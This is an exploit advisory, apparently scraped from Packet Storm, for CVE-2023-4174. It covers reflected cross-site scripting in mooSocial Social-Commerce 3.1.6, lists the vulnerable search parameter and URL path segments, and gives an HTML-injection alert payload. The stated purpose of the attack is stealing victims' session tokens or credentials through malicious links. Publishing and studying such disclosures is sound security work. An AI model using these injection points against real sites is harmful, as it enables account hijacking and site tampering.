Social-Commerce 3.1.6 Cross Site Scripting

2023-08-0700:00:00

CraCkEr

packetstormsecurity.com

148

reflected xss

social-commerce 3.1.6

attacker

malicious links

session tokens

path vulnerability

url path vulnerability

EPSS

0.005

Percentile

76.0%

JSON

`# Exploit Title: Social-Commerce 3.1.6 - Reflected XSS  
# Exploit Author: CraCkEr  
# Date: 28/07/2023  
# Vendor: mooSocial  
# Vendor Homepage: https://moosocial.com/  
# Software Link: https://social-commerce.moosocial.com/  
# Tested on: Windows 10 Pro  
# Impact: Manipulate the content of the site  
# CVE: CVE-2023-4174  
  
  
## Greetings  
  
The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka   
CryptoJob (Twitter) twitter.com/0x0CryptoJob  
  
  
## Description  
  
The attacker can send to victim a link containing a malicious URL in an email or instant message  
can perform a wide variety of actions, such as stealing the victim's session token or login credentials  
  
  
Path: /search/index  
  
GET parameter 'q' is vulnerable to XSS  
  
https://website/search/index?q=[XSS]  
  
  
URL path folder [1,2] is vulnerable to XSS  
  
https://website/stores[XSS]/all-products?store_id=&keyword=&price_from=&price_to=&rating=&store_category_id=&sortby=most_recent  
  
https://website/user_info[XSS]/index/friends  
  
https://website/user_info/index[XSS]/friends  
  
https://website/faqs[XSS]/index?content_search=  
  
https://website/faqs/index[XSS]?content_search=  
  
  
  
XSS Payloads:  
  
j8chn"><img src=a onerror=alert(1)>ridxm  
  
  
[-] Done  
`

EPSS

0.005

Percentile

76.0%

JSON

Related for PACKETSTORM:174017